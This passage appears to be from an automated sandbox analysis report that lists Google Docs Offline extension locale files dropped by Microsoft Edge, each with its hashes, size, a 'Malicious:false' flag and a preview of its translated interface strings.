                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1065
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2771
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):858
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):954
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):899
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2230
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3264
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3235
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3122
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1895
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1042
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
